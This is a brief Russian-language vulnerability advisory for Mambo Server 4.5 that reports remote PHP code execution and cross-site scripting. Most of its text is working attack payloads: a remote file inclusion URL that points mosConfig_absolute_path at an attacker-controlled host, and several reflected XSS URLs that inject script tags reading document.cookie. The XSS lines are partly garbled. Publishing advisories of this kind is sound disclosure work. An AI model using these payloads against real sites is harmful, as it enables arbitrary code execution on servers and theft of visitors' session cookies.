Программа: Mambo Server 4.5 (1.0.9)
Две уязвимости обнаружены в Mambo Server. Удаленный пользователь может выполнить произвольные команды на целевой системе. Удаленный пользователь может выполнить XSS нападение. Выполнение произвольного PHP кода:
http://[target]/includes/Cache/Lite/Function.php? mosConfig_absolute_path=http://[attacker]/
2. XSS:
http://[target]/index.php?option=com_content&task =view&id=18&Itemid=39"><script>alert(document.cookie)
&a&%20I%20am%20an%20XSS%20Problem</h1> <br><br><br><br><br><br><br><br><br><br><br>
<br><br><&http://<site-with-mambo>/index.php? option=com_content&task=view&id=15&Itemid=2
&limit=1"><script>alert(document.cookie)</script> &limitstart=1
